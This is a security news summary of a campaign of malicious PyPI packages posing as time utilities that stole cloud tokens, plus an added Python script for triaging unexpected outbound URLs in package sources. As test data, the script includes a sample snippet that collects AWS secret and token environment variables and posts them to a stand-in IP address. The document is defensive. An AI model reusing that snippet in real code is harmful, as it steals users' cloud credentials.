Malicious PyPI Packages Stole Cloud Tokens—Over 14,100 Downloads Before Removal

Summary: Cybersecurity researchers have identified a malicious campaign targeting users of the Python Package Index (PyPI) through fake libraries, mostly posing as time-related utilities, that are designed to steal sensitive data such as cloud access tokens. The campaign involved 20 packages that were downloaded more than 14,100 times before they were removed from PyPI. Further analysis linked some of these packages to a popular GitHub project, raising supply chain security concerns for that project's users.

Affected: Python Package Index (PyPI)

Key points:

  • 20 malicious packages masquerading as "time"-related utilities were identified, with more than 14,100 downloads between them.
  • Three packages were linked to a popular GitHub project, indicating potential exposure to users of that project.
  • Fortinet discovered thousands of suspicious packages on PyPI and npm, emphasizing the risk of data exfiltration and the importance of scrutinizing external URLs in dependencies.
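
The last key point, scrutinizing external URLs in dependencies, can be turned into a first-pass review check. The script below is an added illustration written for this summary; it is not code from the article, from Fortinet, or from any of the packages described. It scans Python source for outbound URLs whose host is outside an allow-list of expected destinations, and raises the verdict when the same module also references credential locations and performs network calls, which is the combination a token stealer needs. The allow-list, the marker patterns, and the two sample modules (including the 203.0.113.10 address, which sits in a reserved documentation range) are constructed for the example.

```python
"""First-pass check for unexpected outbound URLs in Python package sources.

Added illustration for the key point above; not code from the article, from
Fortinet, or from the packages it describes. Host list, marker patterns and
sample modules are constructed assumptions for this example.
"""
import re
from urllib.parse import urlparse

# Hosts a typical utility package might legitimately reference (assumed list).
DEFAULT_ALLOWED_HOSTS = frozenset({
    "pypi.org", "files.pythonhosted.org", "github.com", "docs.python.org",
})

# Matches http(s) URLs inside string literals, comments or docstrings.
URL_RE = re.compile(r"""https?://[^\s'"<>)\]]+""")

# Indicators that a module reads cloud credentials (assumed marker set).
CREDENTIAL_RE = re.compile(
    r"(AWS_SECRET_ACCESS_KEY|AWS_ACCESS_KEY_ID|\.aws/credentials"
    r"|GOOGLE_APPLICATION_CREDENTIALS|AZURE_CLIENT_SECRET|[A-Z_]*TOKEN[A-Z_]*)"
)

# Indicators that a module talks to the network (assumed marker set).
NETWORK_RE = re.compile(r"\b(urlopen|requests\.(?:get|post)|socket\.|http\.client)\b")


def extract_urls(source: str) -> list:
    """Return every http(s) URL found in the source text."""
    return URL_RE.findall(source)


def classify_urls(source: str, allowed_hosts=DEFAULT_ALLOWED_HOSTS) -> list:
    """Return (url, host) pairs whose host is not an allowed host or a subdomain of one."""
    flagged = []
    for url in extract_urls(source):
        host = urlparse(url).hostname or ""
        permitted = any(host == a or host.endswith("." + a) for a in allowed_hosts)
        if not permitted:
            flagged.append((url, host))
    return flagged


def assess(files: dict, allowed_hosts=DEFAULT_ALLOWED_HOSTS) -> dict:
    """Assess a mapping of path -> source text; return per-file findings and a verdict.

    'suspicious': external URL plus credential access plus network activity in one module.
    'review'    : external URL present but no credential access seen.
    'ok'        : no URLs outside the allow-list.
    """
    report = {}
    for path, text in files.items():
        external = classify_urls(text, allowed_hosts)
        reads_credentials = CREDENTIAL_RE.search(text) is not None
        uses_network = NETWORK_RE.search(text) is not None
        if external and reads_credentials and uses_network:
            verdict = "suspicious"
        elif external:
            verdict = "review"
        else:
            verdict = "ok"
        report[path] = {
            "external_urls": external,
            "reads_credentials": reads_credentials,
            "uses_network": uses_network,
            "verdict": verdict,
        }
    return report


# Constructed sample: a benign time-utility module referencing official docs.
BENIGN_SOURCE = '''
import time
DOCS = "https://docs.python.org/3/library/time.html"
def now_ms():
    return int(time.time() * 1000)
'''

# Constructed sample: a module that gathers credential-like environment
# variables and sends them to an address outside the allow-list.
SUSPICIOUS_SOURCE = '''
import os, urllib.request
def _collect():
    data = {k: v for k, v in os.environ.items()
            if "AWS_SECRET_ACCESS_KEY" in k or "TOKEN" in k}
    urllib.request.urlopen("http://203.0.113.10/collect", data=str(data).encode())
'''

if __name__ == "__main__":
    for path, finding in assess({"time_utils.py": BENIGN_SOURCE,
                                 "_setup_hook.py": SUSPICIOUS_SOURCE}).items():
        print(path, finding["verdict"], finding["external_urls"])
```

In practice the mapping passed to `assess` would be built by walking an unpacked sdist or wheel, including `setup.py`, which runs at install time and therefore deserves the same scrutiny as the package modules themselves. The check is a triage aid: a `review` verdict means an unexpected destination that a human should look at, not a confirmed problem.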

Source: https://thehackernews.com/2025/03/malicious-pypi-packages-stole-cloud.html